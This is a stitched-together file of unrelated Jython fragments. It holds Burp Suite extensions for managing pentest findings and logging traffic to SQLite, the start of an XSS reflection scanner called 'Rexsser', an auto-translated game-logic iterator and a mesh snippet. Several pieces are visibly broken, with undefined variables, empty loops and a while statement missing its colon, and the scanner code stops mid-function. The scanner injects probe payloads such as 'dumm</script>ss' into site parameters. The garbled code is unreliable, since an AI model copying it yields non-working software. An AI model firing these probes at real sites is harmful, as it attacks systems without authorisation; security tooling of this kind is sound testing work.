f = open(path, "rb")
content = f.read()
f.close()
return content
def convertVulntoTable(self, number, name, severity, description, mitigation, request = "None", response = "None", images = "None"):
return """<div style="width: 100%%;height: 30px;text-align: center;background-color:#E0E0E0;font-size: 17px;font-weight: bold;color: #000;padding-top: 10px;">%s <a href="javascript:divHideShow('Table_%s');" style="color:#191970">(OPEN / CLOSE)</a></div>
<div id="Table_%s" style="display: none;">
<table width="100%%" cellspacing="0" cellpadding="0" style="margin: 0px auto;text-align: left;border-top: 0px;">
<tr>
<td>
<div style="font-size: 16px;font-weight: bold;">
<span style="color:#000000">Threat Level: </span>
<span style="color:#8b8989">%s</span>
</td>
</tr>
<tr>
<td>
<div style="font-size: 16px;font-weight: bold;">
<span style="color:#000000">Description</span>
<a href="javascript:divHideShow('Table_%s_Command_03');" style="color:#191970">OPEN / CLOSE >>></a>
</div>
<div id="Table_%s_Command_03" style="display: none;margin-top: 25px;">
%s
</div>
</td>
</tr>
<tr>
<td>
<div style="font-size: 16px;font-weight: bold;">
<span style="color:#000000">Mitigration</span>
<a href="javascript:divHideShow('Table_%s_Command_04');" style="color:#191970">OPEN / CLOSE >>></a>
</div>
<div id="Table_%s_Command_04" style="display: none;margin-top: 25px;">
%s
<b>
</td>
</tr>
<tr>
<td>
<div style="font-size: 16px;font-weight: bold;">
<span style="color:#000000">Request</span>
<a href="javascript:divHideShow('Table_%s_Command_05');" style="color:#191970">OPEN / CLOSE >>></a>
</div>
<div id="Table_%s_Command_05" style="display: none;margin-top: 25px;">
%s
<b>
</td>
</tr>
<tr>
<td>
<div style="font-size: 16px;font-weight: bold;">
<span style="color:#000000">Response</span>
<a href="javascript:divHideShow('Table_%s_Command_06');" style="color:#191970">OPEN / CLOSE >>></a>
</div>
<div id="Table_%s_Command_06" style="display: none;margin-top: 25px;">
%s
<b>
</td>
</tr>
<tr>
<td>
<div style="font-size: 16px;font-weight: bold;">
<span style="color:#000000">Images</span>
<a href="javascript:divHideShow('Table_%s_Command_07');" style="color:#191970">OPEN / CLOSE >>></a>
</div>
<div id="Table_%s_Command_07" style="display: none;margin-top: 25px;">
%s
<b>
</td>
</tr>
</table>
</div><br><br>""" % (name,number,number,severity,number,number,description,number,number,mitigation,number,number,request,number,number,response,number,number,images)
def clearVulnerabilityTab(self, rmVuln=True):
if rmVuln:
self.vulnName.setText("")
self.descriptionString.setText("")
self.mitigationStr.setText("")
self.colorCombo.setSelectedIndex(0)
self.threatLevel.setSelectedIndex(0)
self.screenshotsList.clear()
self.addButton.setText("Add")
self.firstPic.setIcon(None)
def saveRequestResponse(self, type, requestResponse, vulnName):
path = self.getVulnReqResPath(type,vulnName)
f = open(path, 'wb')
f.write(requestResponse)
f.close()
def openProj(self, event):
os.system('explorer ' + self.projPath.getText())
def getVulnReqResPath(self, requestOrResponse, vulnName):
return self.getCurrentProjPath() + "/" + self.clearStr(vulnName) + "/"+requestOrResponse+"_" + self.clearStr(vulnName)
def htmlEscape(self,data):
return data.replace('&', '&').replace('<', '<').replace('>', '>').replace('"', '"').replace("'", ''')
def generateReportFromDocxTemplate(self, zipname, newZipName, filename):
newZipName = self.getCurrentProjPath() + "/" + newZipName
with zipfile.ZipFile(zipname, 'r') as zin:
with zipfile.ZipFile(newZipName, 'w') as zout:
zout.comment = zin.comment
for item in zin.infolist():
if item.filename != filename:
zout.writestr(item, zin.read(item.filename))
else:
xml_content = zin.read(item.filename)
result = re.findall("(.*)<w:body>(?:.*)<\/w:body>(.*)",xml_content)[0]
newXML = result[0]
templateBody = re.findall("<w:body>(.*)<\/w:body>", xml_content)[0]
newBody = ""
for i in range(0,self._log.size()):
tmp = templateBody
tmp = tmp.replace("$vulnerability", self.htmlEscape(self._log.get(i).getName()))
tmp = tmp.replace("$severity", self.htmlEscape(self._log.get(i).getSeverity()))
tmp = tmp.replace("$description", self.htmlEscape(self._log.get(i).getDescription()))
tmp = tmp.replace("$mitigation", self.htmlEscape(self._log.get(i).getMitigation()))
newBody = newBody + tmp
newXML = newXML + newBody
newXML = newXML + result[1]
with zipfile.ZipFile(newZipName, mode='a', compression=zipfile.ZIP_DEFLATED) as zf:
zf.writestr(filename, newXML)
return newZipName
def chooseProjPath(self, event):
self.chooser.setDialogTitle("Select target directory")
self.chooser.setFileSelectionMode(JFileChooser.DIRECTORIES_ONLY)
returnVal = self.chooser.showOpenDialog(None)
if returnVal == JFileChooser.APPROVE_OPTION:
projPath = str(self.chooser.getSelectedFile()) + "/PTManager"
os.makedirs(projPath)
self.projPath.setText(projPath)
def reloadProjects(self):
self.currentProject.setModel(DefaultComboBoxModel(self.config.options('projects')))
def rmProj(self, event):
if self.popUpAreYouSure() == JOptionPane.YES_OPTION:
self._requestViewer.setMessage("None", False)
self._responseViewer.setMessage("None", False)
shutil.rmtree(self.projPath.getText())
self.config.remove_option('projects',self.currentProject.getSelectedItem())
self.reloadProjects()
self.currentProject.setSelectedIndex(0)
self.loadVulnerabilities(self.projPath.getText())
def popup(self,msg):
JOptionPane.showMessageDialog(None,msg)
def addProj(self, event):
projPath = self.projPath.getText()
if projPath == None or projPath == "":
self.popup("Please select path")
return
self.config.set('projects', self.projName.getText(), projPath)
self.saveCfg()
xml = ET.Element('project')
name = ET.SubElement(xml, "name")
path = ET.SubElement(xml, "path")
details = ET.SubElement(xml, "details")
autoSaveMode = ET.SubElement(xml, "autoSaveMode")
name.text = self.projName.getText()
path.text = projPath
details.text = self.projDetails.getText()
autoSaveMode.text = str(self.autoSave.isSelected())
tree = ET.ElementTree(xml)
try:
tree.write(self.getCurrentProjPath()+'/project.xml')
except:
self.popup("Invalid path")
return
self.reloadProjects()
self.clearVulnerabilityTab()
self.clearList(None)
self.currentProject.getModel().setSelectedItem(self.projName.getText())
def resize(self, image, width, height):
bi = BufferedImage(width, height, BufferedImage.TRANSLUCENT)
g2d = bi.createGraphics()
g2d.addRenderingHints(RenderingHints(RenderingHints.KEY_RENDERING, RenderingHints.VALUE_RENDER_QUALITY))
g2d.drawImage(image, 0, 0, width, height, None)
g2d.dispose()
return bi;
def clearStr(self, var):
return var.replace(" " , "_").replace("\\" , "").replace("/" , "").replace(":" , "").replace("*" , "").replace("?" , "").replace("\"" , "").replace("<" , "").replace(">" , "").replace("|" , "").replace("(" , "").replace(")" , "")
def popUpAreYouSure(self):
dialogResult = JOptionPane.showConfirmDialog(None,"Are you sure?","Warning",JOptionPane.YES_NO_OPTION)
if dialogResult == 0:
return 0
return 1
def removeSS(self,event):
if self.popUpAreYouSure() == JOptionPane.YES_OPTION:
os.remove(self.getCurrentVulnPath() + "/" + self.ssList.getSelectedValue())
self.ssList.getModel().remove(self.ssList.getSelectedIndex())
self.firstPic.setIcon(ImageIcon(None))
# check if there is images and select the first one
# bug in linux
def addSS(self,event):
clipboard = Toolkit.getDefaultToolkit().getSystemClipboard()
try:
image = clipboard.getData(DataFlavor.imageFlavor)
except:
self.popup("Clipboard not contains image")
return
vulnPath = self.projPath.getText() + "/" + self.clearStr(self.vulnName.getText())
if not os.path.exists(vulnPath):
os.makedirs(vulnPath)
name = self.clearStr(self.vulnName.getText()) + str(random.randint(1, 99999))+".jpg"
fileName = self.projPath.getText()+"/"+ self.clearStr(self.vulnName.getText()) + "/" + name
file = File(fileName)
bufferedImage = BufferedImage(image.getWidth(None), image.getHeight(None), BufferedImage.TYPE_INT_RGB);
g = bufferedImage.createGraphics();
g.drawImage(image, 0, 0, bufferedImage.getWidth(), bufferedImage.getHeight(), Color.WHITE, None);
ImageIO.write(bufferedImage, "jpg", file)
self.addVuln(self)
self.ssList.setSelectedValue(name,True)
def rmVuln(self, event):
if self.popUpAreYouSure() == JOptionPane.YES_OPTION:
self._requestViewer.setMessage("None", False)
self._responseViewer.setMessage("None", False)
shutil.rmtree(self.getCurrentVulnPath())
self.clearVulnerabilityTab()
self.loadVulnerabilities(self.getCurrentProjPath())
def addVuln(self, event):
if self.colorCombo.getSelectedItem() == "Color:":
colorTxt = None
else:
colorTxt = self.colorCombo.getSelectedItem()
self._lock.acquire()
row = self._log.size()
vulnObject = vulnerability(self.vulnName.getText(),self.threatLevel.getSelectedItem(),self.descriptionString.getText(),self.mitigationStr.getText() ,colorTxt)
self._log.add(vulnObject)
self.fireTableRowsInserted(row, row)
self._lock.release()
vulnPath = self.projPath.getText() + "/" + self.clearStr(self.vulnName.getText())
if not os.path.exists(vulnPath):
os.makedirs(vulnPath)
xml = ET.Element('vulnerability')
name = ET.SubElement(xml, "name")
severity = ET.SubElement(xml, "severity")
description = ET.SubElement(xml, "description")
mitigation = ET.SubElement(xml, "mitigation")
color = ET.SubElement(xml, "color")
name.text = self.vulnName.getText()
severity.text = self.threatLevel.getSelectedItem()
description.text = self.descriptionString.getText()
mitigation.text = self.mitigationStr.getText()
color.text = colorTxt
tree = ET.ElementTree(xml)
tree.write(vulnPath+'/vulnerability.xml')
self.loadVulnerabilities(self.getCurrentProjPath())
self.loadVulnerability(vulnObject)
def vulnNameChanged(self):
if os.path.exists(self.getCurrentVulnPath()) and self.vulnName.getText() != "":
self.addButton.setText("Update")
elif self.addButton.getText() != "Add":
options = ["Create a new vulnerability", "Change current vulnerability name"]
n = JOptionPane.showOptionDialog(None,
"Would you like to?",
"Vulnerability Name",
JOptionPane.YES_NO_CANCEL_OPTION,
JOptionPane.QUESTION_MESSAGE,
None,
options,
options[0]);
if n == 0:
self.clearVulnerabilityTab(False)
self.addButton.setText("Add")
else:
newName = JOptionPane.showInputDialog(
None,
"Enter new name:",
"Vulnerability Name",
JOptionPane.PLAIN_MESSAGE,
None,
None,
self.vulnName.getText())
row = self.logTable.getSelectedRow()
old = self.logTable.getValueAt(row,1)
self.changeVulnName(newName,old)
def changeVulnName(self,new,old):
newpath = self.getCurrentProjPath() + "/" + new
oldpath = self.getCurrentProjPath() + "/" + old
os.rename(oldpath,newpath)
self.changeCurrentVuln(new,0, newpath + "/vulnerability.xml")
def getCurrentVulnPath(self):
return self.projPath.getText() + "/" + self.clearStr(self.vulnName.getText())
def getCurrentProjPath(self):
return self.projPath.getText()
def loadSS(self, imgPath):
image = ImageIO.read(File(imgPath))
if image.getWidth() <= 550 and image.getHeight() <= 400:
self.firstPic.setIcon(ImageIcon(image))
self.firstPic.setSize(image.getWidth(),image.getHeight())
else:
self.firstPic.setIcon(ImageIcon(self.resize(image,550, 400)))
self.firstPic.setSize(550,400)
def clearProjectTab(self):
self.projPath.setText("")
self.projDetails.setText("")
def clearList(self, event):
self._lock.acquire()
self._log = ArrayList()
row = self._log.size()
self.fireTableRowsInserted(row, row)
self._lock.release()
#
# implement IContextMenuFactory
#
def createMenuItems(self, invocation):
responses = invocation.getSelectedMessages();
if responses > 0:
ret = LinkedList()
requestMenuItem = JMenuItem("Send to PT Manager");
requestMenuItem.addActionListener(handleMenuItems(self,responses[0], "request"))
ret.add(requestMenuItem);
return(ret);
return null;
#
# implement ITab
#
def getTabCaption(self):
return "PT Manager"
def getUiComponent(self):
return self._splitpane
#
# extend AbstractTableModel
#
def getRowCount(self):
try:
return self._log.size()
except:
return 0
def getColumnCount(self):
return 3
def getColumnName(self, columnIndex):
if columnIndex == 0:
return "#"
if columnIndex == 1:
return "Vulnerability Name"
if columnIndex == 2:
return "Threat Level"
return ""
def getValueAt(self, rowIndex, columnIndex):
vulnObject = self._log.get(rowIndex)
if columnIndex == 0:
return rowIndex+1
if columnIndex == 1:
return vulnObject.getName()
if columnIndex == 2:
return vulnObject.getSeverity()
if columnIndex == 3:
return vulnObject.getMitigation()
if columnIndex == 4:
return vulnObject.getColor()
return ""
def changeCurrentVuln(self,value,fieldNumber, xmlPath = "def"):
if xmlPath == "def":
xmlPath = self.getCurrentVulnPath() + "/vulnerability.xml"
document = self.getXMLDoc(xmlPath)
nodeList = document.getDocumentElement().getChildNodes()
nodeList.item(fieldNumber).setTextContent(value)
self.saveXMLDoc(document, xmlPath)
self.loadVulnerabilities(self.getCurrentProjPath())
def loadVulnerability(self, vulnObject):
self.addButton.setText("Update")
self.vulnName.setText(vulnObject.getName())
self.threatLevel.setSelectedItem(vulnObject.getSeverity())
self.descriptionString.setText(vulnObject.getDescription())
self.mitigationStr.setText(vulnObject.getMitigation())
if vulnObject.getColor() == "" or vulnObject.getColor() == None:
self.colorCombo.setSelectedItem("Color:")
else:
self.colorCombo.setSelectedItem(vulnObject.getColor())
self.screenshotsList.clear()
for fileName in os.listdir(self.projPath.getText()+"/"+self.clearStr(vulnObject.getName())):
if fileName.endswith(".jpg"):
self.screenshotsList.addElement(fileName)
imgPath = self.projPath.getText()+"/"+self.clearStr(vulnObject.getName())+'/'+fileName
# imgPath = imgPath.replace("/","//")
self.loadSS(imgPath)
if (self.screenshotsList.getSize() == 0):
self.firstPic.setIcon(None)
else:
self.ssList.setSelectedIndex(0)
path = self.getVulnReqResPath("request",vulnObject.getName())
if os.path.exists(path):
f = self.getFileContent(path)
self._requestViewer.setMessage(f, False)
else:
self._requestViewer.setMessage("None", False)
path = self.getVulnReqResPath("response",vulnObject.getName())
if os.path.exists(path):
f = self.getFileContent(path)
self._responseViewer.setMessage(f, False)
else:
self._responseViewer.setMessage("None", False)
from com.embraiz.grap.catcher import JythonExecutor
from java.util import ArrayList
print "Python start"
data = JythonExecutor.getData()
projects = data.get("projects");
list = ArrayList(data.values)
size = list.size()
index = 0
while(index < size)
print "包组"+str(index)
print list.get(index)
print "Python end"
class GuiLog(AbstractTableModel):
'''
Acts as an AbstractTableModel for the table that is shown in the UI tab:
when this data structure changes, the in-UI table is updated.
'''
def __init__(self, callbacks):
'''
Creates a Java-style ArrayList to hold LogEntries that appear in the table
'''
self.ui = None
self._log = ArrayList()
self._lock = Lock()
self._callbacks = callbacks
self._helpers = callbacks.getHelpers()
def clear(self):
'''
Clears all entries from the table
'''
self._lock.acquire()
last = self._log.size()
if last > 0:
self._log.clear()
self.fireTableRowsDeleted(0, last-1)
# Note: if callees modify table this could deadlock
self._lock.release()
def add_entry(self, entry):
'''
Adds entry to the table
'''
self._lock.acquire()
row = self._log.size()
self._log.add(entry)
# Note: if callees modify table this could deadlock
self.fireTableRowsInserted(row, row)
self._lock.release()
def remove_entry(self, entry):
'''
Removes entry from the table
'''
self._lock.acquire()
for i in range(0, len(self._log)):
ei = self._log[i]
if ei.md5 == entry.md5:
self._log.remove(i)
break
self.fireTableRowsDeleted(i, i)
self._lock.release()
def getRowCount(self):
'''
Used by the Java Swing UI
'''
try:
return self._log.size()
except:
return 0
def getColumnCount(self):
'''
Used by the Java Swing UI
'''
return 5
def getColumnName(self, columnIndex):
'''
Used by the Java Swing UI
'''
cols = ["Time added",
"Tool",
"URL",
"Issue",
"Who"]
try:
return cols[columnIndex]
except KeyError:
return ""
def get(self, rowIndex):
'''
Gets the LogEntry at rowIndex
'''
return self._log.get(rowIndex)
def getValueAt(self, rowIndex, columnIndex):
'''
Used by the Java Swing UI
'''
logEntry = self._log.get(rowIndex)
if columnIndex == 0:
return logEntry.timestamp
elif columnIndex == 1:
return logEntry.tool.capitalize()
elif columnIndex == 2:
return logEntry.url
elif columnIndex == 3:
if logEntry.tool == "scanner":
return logEntry.issue_name
else:
return "N/A"
elif columnIndex == 4:
return logEntry.who
return ""
class AssignmentIteratorImpl(AssignmentIterator):
""" generated source for class AssignmentIteratorImpl """
sourceTupleIndices = None
# This time we just have integers to deal with
valueIndices = None
nextAssignment = ArrayList()
assignmentMap = HashMap()
headOnly = False
done = False
plan = AssignmentIterationPlan()
def __init__(self, plan):
""" generated source for method __init__ """
super(AssignmentIteratorImpl, self).__init__()
self.plan = plan
# TODO: Handle this case with a separate class
if plan.getVarsToAssign() == None:
self.headOnly = True
return
# Set up source tuple...
self.sourceTupleIndices = ArrayList(plan.getTuplesBySource().size())
i = 0
while i < plan.getTuplesBySource().size():
self.sourceTupleIndices.add(0)
i += 1
# Set up...
self.valueIndices = ArrayList(plan.getVarsToAssign().size())
i = 0
while i < plan.getVarsToAssign().size():
self.valueIndices.add(0)
self.nextAssignment.add(None)
i += 1
self.assignmentMap.putAll(plan.getHeadAssignment())
# Update "nextAssignment" according to the values of the
# value indices
updateNextAssignment()
# Keep updating it until something really works
makeNextAssignmentValid()
def makeNextAssignmentValid(self):
""" generated source for method makeNextAssignmentValid """
if self.nextAssignment == None:
return
# Something new that can pop up with functional constants...
i = 0
while i < len(self.nextAssignment):
if self.nextAssignment.get(i) == None:
# Some function doesn't agree with the answer here
# So what do we increment?
incrementIndex(self.plan.getIndicesToChangeWhenNull().get(i))
if self.nextAssignment == None:
return
i = -1
i += 1
# Find all the unsatisfied distincts
# Find the pair with the earliest var. that needs to be changed
varsToChange = ArrayList()
d = 0
while d < self.plan.getDistincts().size():
# The assignments must use the assignments implied by nextAssignment
if term1 == term2:
# need to change one of these
varsToChange.add(self.plan.getVarsToChangePerDistinct().get(d))
d += 1
if not varsToChange.isEmpty():
# We want just the one, as it is a full restriction on its
# own behalf
changeOneInNext(Collections.singleton(varToChange))
def getLeftmostVar(self, vars):
""" generated source for method getLeftmostVar """
for var in plan.getVarsToAssign():
if vars.contains(var):
return var
return None
def replaceVariables(self, term):
""" generated source for method replaceVariables """
if isinstance(term, (GdlFunction, )):
raise RuntimeException("Function in the distinct... not handled")
# Use the assignments implied by nextAssignment
if self.plan.getHeadAssignment().containsKey(term):
return self.plan.getHeadAssignment().get(term)
# Translated in head assignment
if isinstance(term, (GdlConstant, )):
return term
index = self.plan.getVarsToAssign().indexOf(term)
return self.nextAssignment.get(index)
def incrementIndex(self, index):
""" generated source for method incrementIndex """
if index < 0:
# Trash the iterator
self.nextAssignment = None
return
if self.plan.getValuesToCompute() != None and self.plan.getValuesToCompute().containsKey(index):
# The constant at this index is functionally computed
self.incrementIndex(index - 1)
return
if self.plan.getSourceDefiningSlot().get(index) != -1:
# This is set by a source; increment the source
incrementSource(self.plan.getSourceDefiningSlot().get(index))
return
# We try increasing the var at index by 1.
# Everything to the right of it gets reset.
# If it can't be increased, increase the number
# to the left instead. If nothing can be
# increased, trash the iterator.
curValue = self.valueIndices.get(index)
if curValue == self.plan.getValuesToIterate().get(index).size() - 1:
self.incrementIndex(index - 1)
return
self.valueIndices.set(index, curValue + 1)
i = index + 1
while i < len(self.valueIndices):
pass
i += 1
updateNextAssignment()
def incrementSource(self, source):
""" generated source for method incrementSource """
if source < 0:
self.nextAssignment = None
return
curValue = self.sourceTupleIndices.get(source)
if curValue == self.plan.getTuplesBySource().get(source).size() - 1:
self.incrementSource(source - 1)
return
self.sourceTupleIndices.set(source, curValue + 1)
i = source + 1
while i < len(self.sourceTupleIndices):
pass
i += 1
i = 0
while i < len(self.valueIndices):
pass
i += 1
updateNextAssignment()
def updateNextAssignment(self):
""" generated source for method updateNextAssignment """
s = 0
while s < len(self.sourceTupleIndices):
if len(tuples) == 0:
self.nextAssignment = None
return
while i < len(tuple_):
if putDontCheck:
self.nextAssignment.set(varSlotChosen, value)
else:
if not self.nextAssignment.get(varSlotChosen) == value:
self.incrementSource(s)
return
i += 1
s += 1
i = 0
while i < len(self.valueIndices):
if (self.plan.getValuesToCompute() == None or not self.plan.getValuesToCompute().containsKey(i)) and self.plan.getSourceDefiningSlot().get(i) == -1:
self.nextAssignment.set(i, self.plan.getValuesToIterate().get(i).get(self.valueIndices.get(i)))
elif self.plan.getSourceDefiningSlot().get(i) == -1:
self.nextAssignment.set(i, valueFromFunction)
i += 1
@overloaded
def changeOneInNext(self, vars):
""" generated source for method changeOneInNext """
if self.nextAssignment == None:
return
if vars.isEmpty():
if self.headOnly:
self.done = True
return
else:
self.done = True
return
if self.plan.getVarsToAssign() == None:
print "headOnly: " + self.headOnly
rightmostVar = getRightmostVar(vars)
self.incrementIndex(self.plan.getVarsToAssign().indexOf(rightmostVar))
self.makeNextAssignmentValid()
@changeOneInNext.register(object, Collection, Map)
def changeOneInNext_0(self, varsToChange, assignment):
""" generated source for method changeOneInNext_0 """
if self.nextAssignment == None:
return
for varToChange in varsToChange:
if index != -1:
if assignedValue == None:
raise IllegalArgumentException("assignedValue is null; " + "varToChange is " + varToChange + " and assignment is " + assignment)
if self.nextAssignment == None:
raise IllegalStateException("nextAssignment is null")
if not assignedValue == self.nextAssignment.get(index):
return
self.changeOneInNext(varsToChange)
def hasNext(self):
""" generated source for method hasNext """
if self.plan.getEmpty():
return False
if self.headOnly:
return (not self.plan.getAllDone() and not self.done)
return (self.nextAssignment != None)
def next(self):
""" generated source for method next """
if self.headOnly:
if self.plan.getAllDone() or self.done:
raise RuntimeException("Asking for next when all done")
self.done = True
return self.plan.getHeadAssignment()
updateMap()
self.incrementIndex(len(self.valueIndices) - 1)
self.makeNextAssignmentValid()
return self.assignmentMap
def updateMap(self):
""" generated source for method updateMap """
i = 0
while i < self.plan.getVarsToAssign().size():
self.assignmentMap.put(self.plan.getVarsToAssign().get(i), self.nextAssignment.get(i))
i += 1
def getRightmostVar(self, vars):
""" generated source for method getRightmostVar """
rightmostVar = None
for var in plan.getVarsToAssign():
if vars.contains(var):
rightmostVar = var
return rightmostVar
def remove(self):
""" generated source for method remove """
class BurpExtender(IBurpExtender, ITab, IHttpListener, IMessageEditorController, AbstractTableModel, IBurpExtenderCallbacks):
import java.net.URLClassLoader
statement = None
con = None
def registerExtenderCallbacks(self, callbacks):
global statement,con
self._callbacks = callbacks
self._helpers = callbacks.getHelpers()
callbacks.setExtensionName("SQLite Logger")
# select sqlite jdbc jar file
c = classPathHacker()
c.addFile("C:\\sqlite-jdbc-3.8.11.2.jar")
# database filename.
jdbc_url = "jdbc:sqlite:database" + str(datetime.date.today()) + ".db"
driver = "org.sqlite.JDBC"
Class.forName(driver).newInstance()
con = DriverManager.getConnection(jdbc_url)
# create table
self.sql = "CREATE TABLE if not exists log(host text,path text,method text,request text,response text,time text);"
statement = con.prepareStatement(self.sql)
statement.executeUpdate()
self._log = ArrayList()
self._lock = Lock()
self._splitpane = JSplitPane(JSplitPane.VERTICAL_SPLIT)
logTable = Table(self)
scrollPane = JScrollPane(logTable)
self._splitpane.setLeftComponent(scrollPane)
tabs = JTabbedPane()
self._requestViewer = callbacks.createMessageEditor(self, False)
self._responseViewer = callbacks.createMessageEditor(self, False)
tabs.addTab("Request", self._requestViewer.getComponent())
tabs.addTab("Response", self._responseViewer.getComponent())
self._splitpane.setRightComponent(tabs)
callbacks.customizeUiComponent(self._splitpane)
callbacks.customizeUiComponent(logTable)
callbacks.customizeUiComponent(scrollPane)
callbacks.customizeUiComponent(tabs)
callbacks.addSuiteTab(self)
callbacks.registerHttpListener(self)
return
def exitSuite(self,False):
con.close()
return
def getTabCaption(self):
return "SQLite Logger"
def getUiComponent(self):
return self._splitpane
def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo):
global statement
# insert into database request,response
if not messageIsRequest:
self._lock.acquire()
row = self._log.size()
self.reqinfo = self._helpers.analyzeRequest(messageInfo)
self.parsed = urlparse.urlparse(self.reqinfo.getUrl().toString())
print "request"
print self._helpers.bytesToString(messageInfo.getRequest())
print ""
print "req header"
print self._helpers.bytesToString(messageInfo.getResponse()).encode('utf8', 'replace')
print ""
self._log.add(LogEntry(toolFlag, self._callbacks.saveBuffersToTempFiles(messageInfo),self.reqinfo.getMethod(), self.parsed.netloc, self.parsed.path))
self.sql = "INSERT INTO log(host,path,method,request,response,time) VALUES (?,?,?,?,?,?);"
statement = con.prepareStatement(self.sql)
statement.setString(1,self.parsed.path)
statement.setString(2,self.parsed.netloc)
statement.setString(3,self.reqinfo.getMethod())
statement.setString(4,self._helpers.bytesToString(messageInfo.getRequest()))
statement.setString(5,self._helpers.bytesToString(messageInfo.getResponse()))
statement.setString(6,str(datetime.datetime.today()))
statement.executeUpdate()
self.fireTableRowsInserted(row, row)
self._lock.release()
return
def getRowCount(self):
try:
return self._log.size()
except:
return 0
def getColumnCount(self):
return 4
def getColumnName(self, columnIndex):
if columnIndex == 0:
return "Tool"
if columnIndex == 1:
return "Method"
if columnIndex == 2:
return "Host"
if columnIndex == 3:
return "Path"
return ""
def getValueAt(self, rowIndex, columnIndex):
logEntry = self._log.get(rowIndex)
if columnIndex == 0:
return self._callbacks.getToolName(logEntry._tool)
if columnIndex == 1:
return logEntry._method
if columnIndex == 2:
return logEntry._host
if columnIndex == 3:
return logEntry._path
return ""
def getHttpService(self):
return self._currentlyDisplayedItem.getHttpService()
def getRequest(self):
return self._currentlyDisplayedItem.getRequest()
def getResponse(self):
return self._currentlyDisplayedItem.getResponse()
if listBeamId is None: listBeamId = TIntArrayList(100) bgroupMap.put(bId, listBeamId) listBeamId.add(i) vertices = ArrayList(mesh.getBeams()) mesh.resetBeams() mapGroupToListOfPolylines = LinkedHashMap() for bId in bgroupMap.keySet(): listBeamId = bgroupMap.get(bId) listOfPolylines = ArrayList() polyline = ArrayList() lastVertex = None for i in xrange(listBeamId.size()): b = listBeamId.get(i) if lastVertex != vertices.get(2*b): # New polyline polyline = ArrayList() listOfPolylines.add(polyline) polyline.add(vertices.get(2*b)) lastVertex = vertices.get(2*b+1) polyline.add(lastVertex) print "Group "+str(bId)+" contains "+str(listOfPolylines.size())+" polylines and "+str(listBeamId.size()+1)+" vertices" mapGroupToListOfPolylines.put(bId, listOfPolylines) for bId in bgroupMap.keySet(): listBeamId = bgroupMap.get(bId) listOfPolylines = mapGroupToListOfPolylines.get(bId) nrPoly = listOfPolylines.size() for numPoly in xrange(nrPoly): polyline = listOfPolylines.get(numPoly)
class BurpExtender(IBurpExtender, IHttpListener, IProxyListener,
IScannerListener, IExtensionStateListener, ITab,
IMessageEditorController, AbstractTableModel):
def registerExtenderCallbacks(self, callbacks):
# set our extension name
self._callbacks = callbacks
self.ATTRIBUTE_QUOTES = "(\".*\")|(\'.*\')"
callbacks.setExtensionName("Rexsser")
# obtain our output stream
self._stdout = PrintWriter(callbacks.getStdout(), True)
self._helpers = callbacks.getHelpers()
# register ourselves as an HTTP listener
self._log = ArrayList()
self._lock = Lock()
# main split pane
self._splitpane = JSplitPane(JSplitPane.VERTICAL_SPLIT)
# table of log entries
logTable = Table(self)
scrollPane = JScrollPane(logTable)
self._splitpane.setLeftComponent(scrollPane)
# tabs with request/response viewers
tabs = JTabbedPane()
self._requestViewer = callbacks.createMessageEditor(self, False)
self._responseViewer = callbacks.createMessageEditor(self, False)
tabs.addTab("Request", self._requestViewer.getComponent())
tabs.addTab("Response", self._responseViewer.getComponent())
self._splitpane.setRightComponent(tabs)
# customize our UI components
callbacks.customizeUiComponent(self._splitpane)
callbacks.customizeUiComponent(logTable)
callbacks.customizeUiComponent(scrollPane)
callbacks.customizeUiComponent(tabs)
# add the custom tab to Burp's UI
callbacks.addSuiteTab(self)
callbacks.registerHttpListener(self)
return
def getTabCaption(self):
return "Rexsser"
def getUiComponent(self):
return self._splitpane
def getRowCount(self):
try:
return self._log.size()
except:
return 0
def getColumnCount(self):
return 4
def getColumnName(self, columnIndex):
if columnIndex == 0:
return "Detail"
if columnIndex == 1:
return "Parameter"
if columnIndex == 2:
return "URL"
if columnIndex == 3:
return "WAF Status"
return ""
def getValueAt(self, rowIndex, columnIndex):
logEntry = self._log.get(rowIndex)
if columnIndex == 0:
return logEntry._detail
if columnIndex == 1:
return logEntry._parameter
if columnIndex == 2:
return logEntry._url
if columnIndex == 3:
return logEntry._waf
return ""
def getHttpService(self):
return self._currentlyDisplayedItem.getHttpService()
def getRequest(self):
return self._currentlyDisplayedItem.getRequest()
def getResponse(self):
return self._currentlyDisplayedItem.getResponse()
def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo):
if messageIsRequest:
return
self.toolFlag = toolFlag
patt = "var (\w+).*=.*(.*)"
payloads = [
"fixedvaluehopefullyexists", "random1'ss", "random2\"ss",
"dumm</script>ss", "<h1>duteer</h1>ss"
]
for payload in payloads:
if self._callbacks.getToolName(toolFlag) == "Proxy":
self.processTestcases(patt, messageInfo, payload)
def issues(self, messageInfo, detail, param, waf):
self._lock.acquire()
row = self._log.size()
self._log.add(
LogEntry(param,
self._callbacks.saveBuffersToTempFiles(messageInfo),
self._helpers.analyzeRequest(messageInfo).getUrl(),
detail, waf))
self.fireTableRowsInserted(row, row)
self._lock.release()
def processTestcases(self, patt, messageInfo, payload):
irequest = self._helpers.analyzeRequest(messageInfo)
url = irequest.getUrl()
response = messageInfo.getResponse()
httpservice = messageInfo.getHttpService()
inject = URLEncoder.encode(payload, "UTF-8")
if self._callbacks.isInScope(url):
#patt = "var (\w+).*=.*('|\")(.*)('|\")"
words = []
x = re.findall(patt, self._helpers.bytesToString(response))
for y in x:
words.append(y[0])
sortedwords = list(set(words))
if len(sortedwords) > 0:
for word in sortedwords:
param = self._helpers.buildParameter(
word, inject, IParameter.PARAM_URL)
newrequest = self._helpers.addParameter(
messageInfo.getRequest(), param)
t = threading.Thread(target=self.makeRequest,
args=[
messageInfo.getHttpService(),
newrequest, word, payload
])
t.daemon = True
t.start()
def makeRequest(self, httpservice, requestBytes, word, payload):
#useHttps = 1 if httpservice.getProtocol() == 'https' else 0
#print(self._helpers.bytesToString(requestBytes))
bRequestResponse = self._callbacks.makeHttpRequest(
httpservice, requestBytes)
tResp = bRequestResponse.getResponse()
status = self._helpers.analyzeResponse(tResp).getStatusCode()
url = self._helpers.analyzeRequest(bRequestResponse).getUrl()
response = self._helpers.bytesToString(tResp)
if status != 302:
if status == 200:
waf = "Allowed"
else:
waf = "Unknown"
if payload in response:
if payload == 'fixedvaluehopefullyexists':
str1 = word + " is a valid parameter"
str2 = self.definesContext(payload, response)
self.issues(bRequestResponse, str2 + " " + str1, word, waf)
if payload == 'random1\'ss':
str1 = word + " single quote reflection allowed"
str2 = self.definesContext(payload, response)
self.issues(bRequestResponse, str2 + " " + str1, word, waf)
if payload == 'random2"ss':
str1 = word + " Double quote allowed"
